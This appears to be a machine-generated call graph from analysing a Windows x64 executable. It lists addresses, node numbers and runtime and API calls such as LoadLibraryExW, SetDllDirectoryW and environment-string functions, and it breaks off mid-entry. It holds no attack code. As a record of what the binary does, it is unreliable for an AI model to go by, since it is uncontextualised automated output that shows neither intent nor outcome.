7ff71250eb98 _get_daylight 11 API calls 16182->16184 16183->16180 16185 7ff71250b3e6 16184->16185 16186 7ff71250b404 FlsSetValue 16185->16186 16187 7ff71250b3f4 FlsSetValue 16185->16187 16189 7ff71250b410 FlsSetValue 16186->16189 16190 7ff71250b422 16186->16190 16188 7ff71250b3fd 16187->16188 16191 7ff71250a948 __free_lconv_num 11 API calls 16188->16191 16189->16188 16196 7ff71250aef4 16190->16196 16191->16193 16193->16172 16201 7ff71250adcc 16196->16201 16213 7ff7125102d8 EnterCriticalSection 16201->16213 16216 7ff71250a64e __GetCurrentState __scrt_get_show_window_mode 16215->16216 16217 7ff71250a676 RtlCaptureContext RtlLookupFunctionEntry 16216->16217 16218 7ff71250a6b0 RtlVirtualUnwind 16217->16218 16219 7ff71250a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16217->16219 16218->16219 16220 7ff71250a738 __GetCurrentState 16219->16220 16223 7ff7124fc550 16220->16223 16224 7ff7124fc559 16223->16224 16225 7ff7124fc564 GetCurrentProcess TerminateProcess 16224->16225 16226 7ff7124fc8e0 IsProcessorFeaturePresent 16224->16226 16227 7ff7124fc8f8 16226->16227 16232 7ff7124fcad8 RtlCaptureContext 16227->16232 16233 7ff7124fcaf2 RtlLookupFunctionEntry 16232->16233 16234 7ff7124fc90b 16233->16234 16235 7ff7124fcb08 RtlVirtualUnwind 16233->16235 16236 7ff7124fc8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16234->16236 16235->16233 16235->16234 16238 7ff71250b309 FlsSetValue 16237->16238 16240 7ff71250b2ec 16237->16240 16239 7ff71250b31b 16238->16239 16251 7ff71250b2f9 16238->16251 16242 7ff71250eb98 _get_daylight 5 API calls 16239->16242 16240->16238 16240->16251 16241 7ff71250b375 SetLastError 16241->16052 16243 7ff71250b32a 16242->16243 16244 7ff71250b348 FlsSetValue 16243->16244 16245 7ff71250b338 FlsSetValue 16243->16245 16247 7ff71250b354 FlsSetValue 16244->16247 16248 7ff71250b366 16244->16248 16246 7ff71250b341 16245->16246 16249 7ff71250a948 __free_lconv_num 5 API calls 16246->16249 16247->16246 16250 7ff71250aef4 _get_daylight 5 API calls 16248->16250 16249->16251 16252 7ff71250b36e 16250->16252 16251->16241 16253 7ff71250a948 __free_lconv_num 5 API calls 16252->16253 16253->16241 16263 7ff712513650 16254->16263 16289 7ff712513608 16263->16289 16294 7ff7125102d8 EnterCriticalSection 16289->16294 16321 7ff7125091b1 16320->16321 16330 7ff7125091ad 16320->16330 16343 7ff7125125f0 16321->16343 16326 7ff7125091cf 16369 7ff71250927c 16326->16369 16327 7ff7125091c3 16328 7ff71250a948 __free_lconv_num 11 API calls 16327->16328 16328->16330 16330->16072 16335 7ff7125094ec 16330->16335 16332 7ff71250a948 __free_lconv_num 11 API calls 16333 7ff7125091f6 16332->16333 16334 7ff71250a948 __free_lconv_num 11 API calls 16333->16334 16334->16330 16336 7ff712509515 16335->16336 16337 7ff71250952e 16335->16337 16336->16072 16337->16336 16338 7ff71250eb98 _get_daylight 11 API calls 16337->16338 16339 7ff7125095be 16337->16339 16340 7ff7125107e8 WideCharToMultiByte 16337->16340 16342 7ff71250a948 __free_lconv_num 11 API calls 16337->16342 16338->16337 16341 7ff71250a948 __free_lconv_num 11 API calls 16339->16341 16340->16337 16341->16336 16342->16337 16344 7ff7125091b6 16343->16344 16345 7ff7125125fd 16343->16345 16349 7ff71251292c GetEnvironmentStringsW 16344->16349 16388 7ff71250b224 16345->16388 16350 7ff7125091bb 16349->16350 16351 7ff71251295c 16349->16351 16350->16326 16350->16327 16352 7ff7125107e8 WideCharToMultiByte 16351->16352 16353 7ff7125129ad 16352->16353 16354 7ff7125129b4 FreeEnvironmentStringsW 16353->16354 16355 7ff71250d5fc _fread_nolock 12 API calls 16353->16355 16354->16350 16356 7ff7125129c7 16355->16356 16357 7ff7125129d8 16356->16357 16358 7ff7125129cf 16356->16358 16360 7ff7125107e8 WideCharToMultiByte 16357->16360 16359 7ff71250a948 __free_lconv_num 11 API calls 16358->16359 16361 7ff7125129d6 16359->16361 16362 7ff7125129fb 16360->16362 16361->16354 16363 7ff712512a09 16362->16363 16364 7ff7125129ff 16362->16364 16365 7ff71250a948 __free_lconv_num 11 API calls 16363->16365 16366 7ff71250a948 __free_lconv_num 11 API calls 16364->16366 16367 7ff712512a07 FreeEnvironmentStringsW 16365->16367 16366->16367 16367->16350 16370 7ff7125092a1 16369->16370 16371 7ff71250eb98 _get_daylight 11 API calls 16370->16371 16384 7ff7125092d7 16371->16384 16372 7ff7125092df 16373 7ff71250a948 __free_lconv_num 11 API calls 16372->16373 16375 7ff7125091d7 16373->16375 16374 7ff712509352 16376 7ff71250a948 __free_lconv_num 11 API calls 16374->16376 16375->16332 16376->16375 16377 7ff71250eb98 _get_daylight 11 API calls 16377->16384 16378 7ff712509341 16607 7ff7125094a8 16378->16607 16379 7ff71250a4a4 __std_exception_copy 37 API calls 16379->16384 16382 7ff71250a948 __free_lconv_num 11 API calls 16382->16372 16383 7ff712509377 16385 7ff71250a900 _isindst 17 API calls 16383->16385 16384->16372 16384->16374 16384->16377 16384->16378 16384->16379 16384->16383 16386 7ff71250a948 __free_lconv_num 11 API calls 16384->16386 16387 7ff71250938a 16385->16387 16386->16384 16389 7ff71250b250 FlsSetValue 16388->16389 16390 7ff71250b235 FlsGetValue 16388->16390 16392 7ff71250b242 16389->16392 16393 7ff71250b25d 16389->16393 16391 7ff71250b24a 16390->16391 16390->16392 16391->16389 16394 7ff71250b248 16392->16394 16395 7ff71250a504 __GetCurrentState 45 API calls 16392->16395 16396 7ff71250eb98 _get_daylight 11 API calls 16393->16396 16408 7ff7125122c4 16394->16408 16397 7ff71250b2c5 16395->16397 16398 7ff71250b26c 16396->16398 16399 7ff71250b28a FlsSetValue 16398->16399 16400 7ff71250b27a FlsSetValue 16398->16400 16401 7ff71250b2a8 16399->16401 16402 7ff71250b296 FlsSetValue 16399->16402 16403 7ff71250b283 16400->16403 16404 7ff71250aef4 _get_daylight 11 API calls 16401->16404 16402->16403 16405 7ff71250a948 __free_lconv_num 11 API calls 16403->16405 16406 7ff71250b2b0 16404->16406 16405->16392 16407 7ff71250a948 __free_lconv_num 11 API calls 16406->16407 16407->16394 16431 7ff712512534 16408->16431 16410 7ff7125122f9 16446 7ff712511fc4 16410->16446 16413 7ff712512316 16413->16344 16416 7ff71251232f 16417 7ff71250a948 __free_lconv_num 11 API calls 16416->16417 16417->16413 16418 7ff71251233e 16418->16418 16460 7ff71251266c 16418->16460 16421 7ff71251243a 16422 7ff712504f08 _get_daylight 11 API calls 16421->16422 16423 7ff71251243f 16422->16423 16426 7ff71250a948 __free_lconv_num 11 API calls 16423->16426 16424 7ff712512495 16425 7ff7125124fc 16424->16425 16471 7ff712511df4 16424->16471 16430 7ff71250a948 __free_lconv_num 11 API calls 16425->16430 16426->16413 16427 7ff712512454 16427->16424 16428 7ff71250a948 __free_lconv_num 11 API calls 16427->16428 16428->16424 16430->16413 16432 7ff712512557 16431->16432 16433 7ff712512561 16432->16433 16486 7ff7125102d8 EnterCriticalSection 16432->16486 16435 7ff7125125d3 16433->16435 16436 7ff71250a504 __GetCurrentState 45 API calls 16433->16436 16435->16410 16439 7ff7125125eb 16436->16439 16441 7ff712512642 16439->16441 16443 7ff71250b224 50 API calls 16439->16443 16441->16410 16444 7ff71251262c 16443->16444 16445 7ff7125122c4 65 API calls 16444->16445 16445->16441 16487 7ff712504f4c 16446->16487 16449 7ff712511fe4 GetOEMCP 16451 7ff71251200b 16449->16451 16450 7ff712511ff6 16450->16451 16452 7ff712511ffb GetACP 16450->16452 16451->16413 16453 7ff71250d5fc 16451->16453 16452->16451 16454 7ff71250d647 16453->16454 16458 7ff71250d60b _get_daylight 16453->16458 16456 7ff712504f08 _get_daylight 11 API calls 16454->16456 16455 7ff71250d62e HeapAlloc 16457 7ff71250d645 16455->16457 16455->16458 16456->16457 16457->16416 16457->16418 16458->16454 16458->16455 16459 7ff712513590 _get_daylight 2 API calls 16458->16459 16459->16458 16461 7ff712511fc4 47 API calls 16460->16461 16462 7ff712512699 16461->16462 16463 7ff7125127ef 16462->16463 16464 7ff7125126d6 IsValidCodePage 16462->16464 16470 7ff7125126f0 __scrt_get_show_window_mode 16462->16470 16465 7ff7124fc550 _log10_special 8 API calls 16463->16465 16464->16463 16466 7ff7125126e7 16464->16466 16467 7ff712512431 16465->16467 16468 7ff712512716 GetCPInfo 16466->16468 16466->16470 16467->16421 16467->16427 16468->16463 16468->16470 16519 7ff7125120dc 16470->16519 16606 7ff7125102d8 EnterCriticalSection 16471->16606 16488 7ff712504f6b 16487->16488 16489 7ff712504f70 16487->16489 16488->16449 16488->16450 16489->16488 16490 7ff71250b150 __GetCurrentState 45 API calls 16489->16490 16491 7ff712504f8b 16490->16491 16495 7ff71250d984 16491->16495 16496 7ff71250d999 16495->16496 16497 7ff712504fae 16495->16497 16496->16497 16503 7ff712513304 16496->16503 16499 7ff71250d9f0 16497->16499 16500 7ff71250da05 16499->16500 16502 7ff71250da18 16499->16502 16500->16502 16516 7ff712512650 16500->16516 16502->16488 16504 7ff71250b150 __GetCurrentState 45 API calls 16503->16504 16505 7ff712513313 16504->16505 16506 7ff71251335e 16505->16506 16515 7ff7125102d8 EnterCriticalSection 16505->16515 16506->16497 16517 7ff71250b150 __GetCurrentState 45 API calls 16516->16517 16518 7ff712512659 16517->16518 16520 7ff712512119 GetCPInfo 16519->16520 16529 7ff71251220f 16519->16529 16525 7ff71251212c 16520->16525 16520->16529 16521 7ff7124fc550 _log10_special 8 API calls 16523 7ff7125122ae 16521->16523 16523->16463 16530 7ff712512e40 16525->16530 16529->16521 16531 7ff712504f4c 45 API calls 16530->16531 16532 7ff712512e82 16531->16532 16550 7ff71250f8a0 16532->16550 16552 7ff71250f8a9 MultiByteToWideChar 16550->16552 16611 7ff7125094ad 16607->16611 16612 7ff712509349 16607->16612 16608 7ff7125094d6 16610 7ff71250a948 __free_lconv_num 11 API calls 16608->16610 16609 7ff71250a948 __free_lconv_num 11 API calls 16609->16611 16610->16612 16611->16608 16611->16609 16612->16382 16614 7ff7125162d8 16613->16614 16615 7ff7125162c1 16613->16615 16614->16615 16618 7ff7125162e6 16614->16618 16616 7ff712504f08 _get_daylight 11 API calls 16615->16616 16617 7ff7125162c6 16616->16617 16619 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 16617->16619 16620 7ff7125162d1 16618->16620 16621 7ff712504f4c 45 API calls 16618->16621 16619->16620 16620->16090 16621->16620 16623 7ff712504f4c 45 API calls 16622->16623 16624 7ff712518f71 16623->16624 16627 7ff712518bc8 16624->16627 16629 7ff712518c16 16627->16629 16628 7ff7124fc550 _log10_special 8 API calls 16630 7ff712517205 16628->16630 16631 7ff712518c9d 16629->16631 16633 7ff712518c88 GetCPInfo 16629->16633 16634 7ff712518ca1 16629->16634 16630->16090 16630->16115 16632 7ff71250f8a0 _fread_nolock MultiByteToWideChar 16631->16632 16631->16634 16635 7ff712518d35 16632->16635 16633->16631 16633->16634 16634->16628 16635->16634 16636 7ff71250d5fc _fread_nolock 12 API calls 16635->16636 16637 7ff712518d6c 16635->16637 16636->16637 16637->16634 16638 7ff71250f8a0 _fread_nolock MultiByteToWideChar 16637->16638 16639 7ff712518dda 16638->16639 16640 7ff712518ebc 16639->16640 16641 7ff71250f8a0 _fread_nolock MultiByteToWideChar 16639->16641 16640->16634 16642 7ff71250a948 __free_lconv_num 11 API calls 16640->16642 16643 7ff712518e00 16641->16643 16642->16634 16643->16640 16644 7ff71250d5fc _fread_nolock 12 API calls 16643->16644 16645 7ff712518e2d 16643->16645 16644->16645 16645->16640 16646 7ff71250f8a0 _fread_nolock MultiByteToWideChar 16645->16646 16647 7ff712518ea4 16646->16647 16648 7ff712518eaa 16647->16648 16649 7ff712518ec4 16647->16649 16648->16640 16652 7ff71250a948 __free_lconv_num 11 API calls 16648->16652 16656 7ff71250ef68 16649->16656 16652->16640 16653 7ff712518f03 16653->16634 16655 7ff71250a948 __free_lconv_num 11 API calls 16653->16655 16654 7ff71250a948 __free_lconv_num 11 API calls 16654->16653 16655->16634 16657 7ff71250ed10 __crtLCMapStringW 5 API calls 16656->16657 16658 7ff71250efa6 16657->16658 16659 7ff71250f1d0 __crtLCMapStringW 5 API calls 16658->16659 16660 7ff71250efae 16658->16660 16661 7ff71250f017 CompareStringW 16659->16661 16660->16653 16660->16654 16661->16660 16663 7ff712517c5a HeapSize 16662->16663 16664 7ff712517c41 16662->16664 16665 7ff712504f08 _get_daylight 11 API calls 16664->16665 16666 7ff712517c46 16665->16666 16667 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 16666->16667 16668 7ff712517c51 16667->16668 16668->16119 16670 7ff712517c89 16669->16670 16671 7ff712517c93 16669->16671 16672 7ff71250d5fc _fread_nolock 12 API calls 16670->16672 16673 7ff712517c98 16671->16673 16679 7ff712517c9f _get_daylight 16671->16679 16677 7ff712517c91 16672->16677 16674 7ff71250a948 __free_lconv_num 11 API calls 16673->16674 16674->16677 16675 7ff712517cd2 HeapReAlloc 16675->16677 16675->16679 16676 7ff712517ca5 16678 7ff712504f08 _get_daylight 11 API calls 16676->16678 16677->16124 16678->16677 16679->16675 16679->16676 16680 7ff712513590 _get_daylight 2 API calls 16679->16680 16680->16679 16682 7ff71250ed10 __crtLCMapStringW 5 API calls 16681->16682 16683 7ff71250ef44 16682->16683 16683->16128 16685 7ff7125054d6 16684->16685 16686 7ff7125054fa 16684->16686 16690 7ff71250a948 __free_lconv_num 11 API calls 16685->16690 16691 7ff7125054e5 16685->16691 16687 7ff712505554 16686->16687 16688 7ff7125054ff 16686->16688 16689 7ff71250f8a0 _fread_nolock MultiByteToWideChar 16687->16689 16688->16691 16692 7ff712505514 16688->16692 16695 7ff71250a948 __free_lconv_num 11 API calls 16688->16695 16699 7ff712505570 16689->16699 16690->16691 16691->16132 16691->16133 16693 7ff71250d5fc _fread_nolock 12 API calls 16692->16693 16693->16691 16694 7ff712505577 GetLastError 16706 7ff712504e7c 16694->16706 16695->16692 16697 7ff71250f8a0 _fread_nolock MultiByteToWideChar 16702 7ff7125055f6 16697->16702 16699->16694 16700 7ff71250a948 __free_lconv_num 11 API calls 16699->16700 16704 7ff7125055a5 16699->16704 16705 7ff7125055b2 16699->16705 16700->16704 16701 7ff71250d5fc _fread_nolock 12 API calls 16701->16705 16702->16691 16702->16694 16703 7ff712504f08 _get_daylight 11 API calls 16703->16691 16704->16701 16705->16691 16705->16697 16707 7ff71250b2c8 _get_daylight 11 API calls 16706->16707 16708 7ff712504e89 __free_lconv_num 16707->16708 16709 7ff71250b2c8 _get_daylight 11 API calls 16708->16709 16710 7ff712504eab 16709->16710 16710->16703 19537 7ff712509d50 19540 7ff712509ccc 19537->19540 19547 7ff7125102d8 EnterCriticalSection 19540->19547 19792 7ff71250afd0 19793 7ff71250afea 19792->19793 19794 7ff71250afd5 19792->19794 19798 7ff71250aff0 19794->19798 19799 7ff71250b03a 19798->19799 19800 7ff71250b032 19798->19800 19802 7ff71250a948 __free_lconv_num 11 API calls 19799->19802 19801 7ff71250a948 __free_lconv_num 11 API calls 19800->19801 19801->19799 19803 7ff71250b047 19802->19803 19804 7ff71250a948 __free_lconv_num 11 API calls 19803->19804 19805 7ff71250b054 19804->19805 19806 7ff71250a948 __free_lconv_num 11 API calls 19805->19806 19807 7ff71250b061 19806->19807 19808 7ff71250a948 __free_lconv_num 11 API calls 19807->19808 19809 7ff71250b06e 19808->19809 19810 7ff71250a948 __free_lconv_num 11 API calls 19809->19810 19811 7ff71250b07b 19810->19811 19812 7ff71250a948 __free_lconv_num 11 API calls 19811->19812 19813 7ff71250b088 19812->19813 19814 7ff71250a948 __free_lconv_num 11 API calls 19813->19814 19815 7ff71250b095 19814->19815 19816 7ff71250a948 __free_lconv_num 11 API calls 19815->19816 19817 7ff71250b0a5 19816->19817 19818 7ff71250a948 __free_lconv_num 11 API calls 19817->19818 19819 7ff71250b0b5 19818->19819 19824 7ff71250ae94 19819->19824 19838 7ff7125102d8 EnterCriticalSection 19824->19838 19551 7ff7124fcb50 19552 7ff7124fcb60 19551->19552 19568 7ff712509ba8 19552->19568 19554 7ff7124fcb6c 19574 7ff7124fce48 19554->19574 19556 7ff7124fd12c 7 API calls 19558 7ff7124fcc05 19556->19558 19557 7ff7124fcb84 _RTC_Initialize 19566 7ff7124fcbd9 19557->19566 19579 7ff7124fcff8 19557->19579 19560 7ff7124fcb99 19582 7ff712509014 19560->19582 19566->19556 19567 7ff7124fcbf5 19566->19567 19569 7ff712509bb9 19568->19569 19570 7ff712504f08 _get_daylight 11 API calls 19569->19570 19571 7ff712509bc1 19569->19571 19572 7ff712509bd0 19570->19572 19571->19554 19573 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 19572->19573 19573->19571 19575 7ff7124fce59 19574->19575 19578 7ff7124fce5e __scrt_release_startup_lock 19574->19578 19576 7ff7124fd12c 7 API calls 19575->19576 19575->19578 19577 7ff7124fced2 19576->19577 19578->19557 19607 7ff7124fcfbc 19579->19607 19581 7ff7124fd001 19581->19560 19583 7ff7124fcba5 19582->19583 19584 7ff712509034 19582->19584 19583->19566 19606 7ff7124fd0cc InitializeSListHead 19583->19606 19585 7ff71250903c 19584->19585 19586 7ff712509052 GetModuleFileNameW 19584->19586 19587 7ff712504f08 _get_daylight 11 API calls 19585->19587 19590 7ff71250907d 19586->19590 19588 7ff712509041 19587->19588 19589 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 19588->19589 19589->19583 19622 7ff712508fb4 19590->19622 19593 7ff7125090c5 19594 7ff712504f08 _get_daylight 11 API calls 19593->19594 19595 7ff7125090ca 19594->19595 19596 7ff71250a948 __free_lconv_num 11 API calls 19595->19596 19596->19583 19597 7ff7125090ff 19599 7ff71250a948 __free_lconv_num 11 API calls 19597->19599 19598 7ff7125090dd 19598->19597 19600 7ff71250912b 19598->19600 19601 7ff712509144 19598->19601 19599->19583 19602 7ff71250a948 __free_lconv_num 11 API calls 19600->19602 19604 7ff71250a948 __free_lconv_num 11 API calls 19601->19604 19603 7ff712509134 19602->19603 19605 7ff71250a948 __free_lconv_num 11 API calls 19603->19605 19604->19597 19605->19583 19608 7ff7124fcfd6 19607->19608 19610 7ff7124fcfcf 19607->19610 19611 7ff71250a1ec 19608->19611 19610->19581 19614 7ff712509e28 19611->19614 19621 7ff7125102d8 EnterCriticalSection 19614->19621 19623 7ff712508fcc 19622->19623 19624 7ff712509004 19622->19624 19623->19624 19625 7ff71250eb98 _get_daylight 11 API calls 19623->19625 19624->19593 19624->19598 19626 7ff712508ffa 19625->19626 19627 7ff71250a948 __free_lconv_num 11 API calls 19626->19627 19627->19624 19628 7ff71250c520 19639 7ff7125102d8 EnterCriticalSection 19628->19639 20482 7ff7125116b0 20493 7ff7125173e4 20482->20493 20494 7ff7125173f1 20493->20494 20495 7ff71250a948 __free_lconv_num 11 API calls 20494->20495 20496 7ff71251740d 20494->20496 20495->20494 20497 7ff71250a948 __free_lconv_num 11 API calls 20496->20497 20498 7ff7125116b9 20496->20498 20497->20496 20499 7ff7125102d8 EnterCriticalSection 20498->20499 16787 7ff7124fcc3c 16808 7ff7124fce0c 16787->16808 16790 7ff7124fcd88 16962 7ff7124fd12c IsProcessorFeaturePresent 16790->16962 16791 7ff7124fcc58 __scrt_acquire_startup_lock 16793 7ff7124fcd92 16791->16793 16798 7ff7124fcc76 __scrt_release_startup_lock 16791->16798 16794 7ff7124fd12c 7 API calls 16793->16794 16796 7ff7124fcd9d __GetCurrentState 16794->16796 16795 7ff7124fcc9b 16797 7ff7124fcd21 16814 7ff7124fd274 16797->16814 16798->16795 16798->16797 16951 7ff712509b2c 16798->16951 16800 7ff7124fcd26 16817 7ff7124f1000 16800->16817 16805 7ff7124fcd49 16805->16796 16958 7ff7124fcf90 16805->16958 16809 7ff7124fce14 16808->16809 16810 7ff7124fce20 __scrt_dllmain_crt_thread_attach 16809->16810 16811 7ff7124fce2d 16810->16811 16812 7ff7124fcc50 16810->16812 16811->16812 16969 7ff7124fd888 16811->16969 16812->16790 16812->16791 16996 7ff71251a4d0 16814->16996 16818 7ff7124f1009 16817->16818 16998 7ff712505484 16818->16998 16820 7ff7124f37fb 17005 7ff7124f36b0 16820->17005 16824 7ff7124fc550 _log10_special 8 API calls 16826 7ff7124f3ca7 16824->16826 16956 7ff7124fd2b8 GetModuleHandleW 16826->16956 16827 7ff7124f391b 17181 7ff7124f45c0 16827->17181 16828 7ff7124f383c 17172 7ff7124f1c80 16828->17172 16831 7ff7124f385b 17077 7ff7124f8830 16831->17077 16834 7ff7124f396a 17204 7ff7124f2710 16834->17204 16835 7ff7124f388e 16845 7ff7124f38bb __vcrt_freefls 16835->16845 17176 7ff7124f89a0 16835->17176 16838 7ff7124f395d 16839 7ff7124f3984 16838->16839 16840 7ff7124f3962 16838->16840 16841 7ff7124f1c80 49 API calls 16839->16841 17200 7ff71250004c 16840->17200 16844 7ff7124f39a3 16841->16844 16849 7ff7124f1950 115 API calls 16844->16849 16846 7ff7124f8830 14 API calls 16845->16846 16853 7ff7124f38de __vcrt_freefls 16845->16853 16846->16853 16848 7ff7124f3a0b 16850 7ff7124f89a0 40 API calls 16848->16850 16852 7ff7124f39ce 16849->16852 16851 7ff7124f3a17 16850->16851 16854 7ff7124f89a0 40 API calls 16851->16854 16852->16831 16855 7ff7124f39de 16852->16855 16859 7ff7124f390e __vcrt_freefls 16853->16859 17090 7ff7124f8940 16853->17090 16856 7ff7124f3a23 16854->16856 16857 7ff7124f2710 54 API calls 16855->16857 16858 7ff7124f89a0 40 API calls 16856->16858 16898 7ff7124f3808 __vcrt_freefls 16857->16898 16858->16859 16860 7ff7124f8830 14 API calls 16859->16860 16861 7ff7124f3a3b 16860->16861 16862 7ff7124f3b2f 16861->16862 16863 7ff7124f3a60 __vcrt_freefls 16861->16863 16864 7ff7124f2710 54 API calls 16862->16864 16865 7ff7124f8940 40 API calls 16863->16865 16870 7ff7124f3aab 16863->16870 16864->16898 16865->16870 16866 7ff7124f8830 14 API calls 16867 7ff7124f3bf4 __vcrt_freefls 16866->16867 16868 7ff7124f3c46 16867->16868 16869 7ff7124f3d41 16867->16869 16871 7ff7124f3cd4 16868->16871 16872 7ff7124f3c50 16868->16872 17215 7ff7124f44e0 16869->17215 16870->16866 16875 7ff7124f8830 14 API calls 16871->16875 17097 7ff7124f90e0 16872->17097 16880 7ff7124f3ce0 16875->16880 16876 7ff7124f3d4f 16877 7ff7124f3d65 16876->16877 16878 7ff7124f3d71 16876->16878 17218 7ff7124f4630 16877->17218 16883 7ff7124f1c80 49 API calls 16878->16883 16881 7ff7124f3c61 16880->16881 16884 7ff7124f3ced 16880->16884 16886 7ff7124f2710 54 API calls 16881->16886 16893 7ff7124f3cc8 __vcrt_freefls 16883->16893 16887 7ff7124f1c80 49 API calls 16884->16887 16886->16898 16890 7ff7124f3d0b 16887->16890 16888 7ff7124f3dc4 17147 7ff7124f9390 16888->17147 16892 7ff7124f3d12 16890->16892 16890->16893 16896 7ff7124f2710 54 API calls 16892->16896 16893->16888 16894 7ff7124f3da7 SetDllDirectoryW LoadLibraryExW 16893->16894 16894->16888 16895 7ff7124f3dd7 SetDllDirectoryW 16899 7ff7124f3e0a 16895->16899 16940 7ff7124f3e5a 16895->16940 16896->16898 16898->16824 16900 7ff7124f8830 14 API calls 16899->16900 16908 7ff7124f3e16 __vcrt_freefls 16900->16908 16901 7ff7124f4008 16903 7ff7124f4035 16901->16903 16904 7ff7124f4012 PostMessageW GetMessageW 16901->16904 16902 7ff7124f3f1b 17152 7ff7124f33c0 16902->17152 17295 7ff7124f3360 16903->17295 16904->16903 16910 7ff7124f3ef2 16908->16910 16915 7ff7124f3e4e 16908->16915 16914 7ff7124f8940 40 API calls 16910->16914 16914->16940 16915->16940 17221 7ff7124f6dc0 16915->17221 16920 7ff7124f6fc0 FreeLibrary 16922 7ff7124f405b 16920->16922 16928 7ff7124f3e81 16931 7ff7124f3ea2 16928->16931 16942 7ff7124f3e85 16928->16942 17242 7ff7124f6e00 16928->17242 16931->16942 17261 7ff7124f71b0 16931->17261 16940->16901 16940->16902 16942->16940 17277 7ff7124f2a50 16942->17277 16952 7ff712509b43 16951->16952 16953 7ff712509b64 16951->16953 16952->16797 16954 7ff71250a3d8 45 API calls 16953->16954 16955 7ff712509b69 16954->16955 16957 7ff7124fd2c9 16956->16957 16957->16805 16959 7ff7124fcfa1 16958->16959 16960 7ff7124fcd60 16959->16960 16961 7ff7124fd888 7 API calls 16959->16961 16960->16795 16961->16960 16963 7ff7124fd152 __GetCurrentState __scrt_get_show_window_mode 16962->16963 16964 7ff7124fd171 RtlCaptureContext RtlLookupFunctionEntry 16963->16964 16965 7ff7124fd1d6 __scrt_get_show_window_mode 16964->16965 16966 7ff7124fd19a RtlVirtualUnwind 16964->16966 16967 7ff7124fd208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16965->16967 16966->16965 16968 7ff7124fd256 __GetCurrentState 16967->16968 16968->16793 16970 7ff7124fd890 16969->16970 16971 7ff7124fd89a 16969->16971 16975 7ff7124fdc24 16970->16975 16971->16812 16976 7ff7124fdc33 16975->16976 16977 7ff7124fd895 16975->16977 16983 7ff7124fde60 16976->16983 16979 7ff7124fdc90 16977->16979 16980 7ff7124fdcbb 16979->16980 16981 7ff7124fdcbf 16980->16981 16982 7ff7124fdc9e DeleteCriticalSection 16980->16982 16981->16971 16982->16980 16987 7ff7124fdcc8 16983->16987 16988 7ff7124fddb2 TlsFree 16987->16988 16994 7ff7124fdd0c __vcrt_InitializeCriticalSectionEx 16987->16994 16989 7ff7124fdd3a LoadLibraryExW 16991 7ff7124fdd5b GetLastError 16989->16991 16992 7ff7124fddd9 16989->16992 16990 7ff7124fddf9 GetProcAddress 16990->16988 16991->16994 16992->16990 16993 7ff7124fddf0 FreeLibrary 16992->16993 16993->16990 16994->16988 16994->16989 16994->16990 16995 7ff7124fdd7d LoadLibraryExW 16994->16995 16995->16992 16995->16994 16997 7ff7124fd28b GetStartupInfoW 16996->16997 16997->16800 17000 7ff71250f480 16998->17000 16999 7ff71250f4d3 17001 7ff71250a814 _invalid_parameter_noinfo 37 API calls 16999->17001 17000->16999 17002 7ff71250f526 17000->17002 17004 7ff71250f4fc 17001->17004 17308 7ff71250f358 17002->17308 17004->16820 17316 7ff7124fc850 17005->17316 17008 7ff7124f3710 17318 7ff7124f9280 FindFirstFileExW 17008->17318 17009 7ff7124f36eb GetLastError 17323 7ff7124f2c50 17009->17323 17013 7ff7124f3706 17017 7ff7124fc550 _log10_special 8 API calls 17013->17017 17014 7ff7124f3723 17338 7ff7124f9300 CreateFileW 17014->17338 17015 7ff7124f377d 17349 7ff7124f9440 17015->17349 17020 7ff7124f37b5 17017->17020 17020->16898 17027 7ff7124f1950 17020->17027 17021 7ff7124f378b 17021->17013 17025 7ff7124f2810 49 API calls 17021->17025 17022 7ff7124f3734 17341 7ff7124f2810 17022->17341 17023 7ff7124f374c __vcrt_InitializeCriticalSectionEx 17023->17015 17025->17013 17028 7ff7124f45c0 108 API calls 17027->17028 17029 7ff7124f1985 17028->17029 17030 7ff7124f1c43 17029->17030 17031 7ff7124f7f90 83 API calls 17029->17031 17032 7ff7124fc550 _log10_special 8 API calls 17030->17032 17033 7ff7124f19cb 17031->17033 17034 7ff7124f1c5e 17032->17034 17076 7ff7124f1a03 17033->17076 17694 7ff7125006d4 17033->17694 17034->16827 17034->16828 17036 7ff71250004c 74 API calls 17036->17030 17037 7ff7124f19e5 17038 7ff7124f19e9 17037->17038 17039 7ff7124f1a08 17037->17039 17040 7ff712504f08 _get_daylight 11 API calls 17038->17040 17698 7ff71250039c 17039->17698 17042 7ff7124f19ee 17040->17042 17701 7ff7124f2910 17042->17701 17044 7ff7124f1a45 17050 7ff7124f1a7b 17044->17050 17051 7ff7124f1a5c 17044->17051 17045 7ff7124f1a26 17047 7ff712504f08 _get_daylight 11 API calls 17045->17047 17048 7ff7124f1a2b 17047->17048 17049 7ff7124f2910 54 API calls 17048->17049 17049->17076 17053 7ff7124f1c80 49 API calls 17050->17053 17052 7ff712504f08 _get_daylight 11 API calls 17051->17052 17054 7ff7124f1a61 17052->17054 17055 7ff7124f1a92 17053->17055 17057 7ff7124f2910 54 API calls 17054->17057 17056 7ff7124f1c80 49 API calls 17055->17056 17058 7ff7124f1add 17056->17058 17057->17076 17059 7ff7125006d4 73 API calls 17058->17059 17060 7ff7124f1b01 17059->17060 17061 7ff7124f1b35 17060->17061 17062 7ff7124f1b16 17060->17062 17064 7ff71250039c _fread_nolock 53 API calls 17061->17064 17063 7ff712504f08 _get_daylight 11 API calls 17062->17063 17065 7ff7124f1b1b 17063->17065 17066 7ff7124f1b4a 17064->17066 17067 7ff7124f2910 54 API calls 17065->17067 17068 7ff7124f1b6f 17066->17068 17069 7ff7124f1b50 17066->17069 17067->17076 17716 7ff712500110 17068->17716 17071 7ff712504f08 _get_daylight 11 API calls 17069->17071 17072 7ff7124f1b55 17071->17072 17074 7ff7124f2910 54 API calls 17072->17074 17074->17076 17075 7ff7124f2710 54 API calls 17075->17076 17076->17036 17078 7ff7124f883a 17077->17078 17079 7ff7124f9390 2 API calls 17078->17079 17080 7ff7124f8859 GetEnvironmentVariableW 17079->17080 17081 7ff7124f8876 ExpandEnvironmentStringsW 17080->17081 17082 7ff7124f88c2 17080->17082 17081->17082 17084 7ff7124f8898 17081->17084 17083 7ff7124fc550 _log10_special 8 API calls 17082->17083 17085 7ff7124f88d4 17083->17085 17086 7ff7124f9440 2 API calls 17084->17086 17085->16835 17087 